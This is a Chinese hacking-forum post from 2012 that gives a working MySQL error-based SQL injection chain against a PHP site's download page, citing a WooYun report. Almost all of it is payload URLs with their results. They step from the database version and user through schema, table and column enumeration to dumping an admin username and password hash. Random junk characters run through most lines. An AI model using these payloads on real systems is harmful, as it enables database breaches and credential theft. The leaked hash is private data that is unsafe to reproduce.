找回密码
 立即注册
查看: 2644|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
4 L. A) }, }" N5 d/ b; |5 W6 w; R! W9 Z+ E# ?" V( }2 \
之前想找个测试 没想到这有 可以测试下做个记录而已
' {' h* P2 u3 m' v; Y) k6 }- q  j( s7 A7 A1 n
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0032 z' o. c6 L# B; C
5 F3 w8 b7 W! K8 e8 `2 O9 B2 s4 L! ]
/data0/htdocs/leqi_new/app/myapp.php
* G' T1 K; ^$ _9 {, d2 a  c6 b; u9 ]3 x1 _7 `9 I) M
或者/ _# ^/ s" G2 m4 |) I9 n6 C  k
7 w. _1 Y' S: Y: ^9 V7 D
/**********version()**********/ 5.1.49-log' c6 H+ M# |( {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ a8 r: s0 W/ B# g) L6 [1 W7 B- M0 ^
; H2 {( M7 t9 x: Y; s5 l6 }* C
/**********user()**********/  
- i! Z3 y( o" `3 o2 ^# D5 J3 u! dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" l0 ~) R+ u3 X$ g; C8 m$ b
$ y/ ]+ R9 C0 D
/**********database()**********/  leqi
7 h- W" t3 e, {: J: q' P3 y+ A( g' Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% ~! Y# F/ `* q; H) g' H' X, l3 a7 v* O$ a9 i6 R; h
/**********limit依次递归爆库**********/
- S- B9 P: ]  Q9 n' j& `. Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ p' O2 f- R- M/ e! \information_schema
7 |  j! m6 }8 d* S6 A. Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ S6 L0 L0 T5 L8 |% }9 Eleqi3 q+ n+ O+ G6 V5 ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! ]/ X* k" @; w$ y
test/ x* D1 T) P( S  v
. J* g$ n$ U7 u( b, s' S; O" F$ U- C3 E2 A
/**********limit依次递归爆表名**********/' q+ c$ |$ P/ Z+ L! ?: b
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- g# K7 g; V; W6 ?users
' e% z, {6 S! u
# r/ x  }# }% n1 ]/**********limit依次递归爆字段名**********/
/ [% E* A; p$ F" G; S! Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 O* K2 D8 d) Yuser_id,username,nickname,passwd,group_id. r5 p7 l* s' f( A, s" j- V: e0 c0 E
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ X2 n# ~9 f" d8 S, D2 f) u; Z
/wapc/5000_0005_0038 I: _/ V& t7 o. h4 F' L- u, ^
11 21# C% h2 J# i2 ]3 p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23' }; {4 l1 j0 n+ [9 C
/wapc/5000_0005_003% F3 H& s% g1 O' |$ F7 T" }
11 341 351 361
2 o3 c, @: A$ {8 S  @9 }/**********爆数据**********/5 e. J( T- _0 s% O' K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! x  B& C% u+ M9 K0 f! s9 P
admin9 z$ _! S2 d+ a5 x9 V
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%234 \7 x9 w+ o6 J# D2 q% Y
6a8b4574ca231eb8bd52764d4978ffcd
2 {5 [% w0 @. c* T5 Z% h7 [4 e0 H( R( L0 q% G
, k  S; K1 {) j( l/ \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表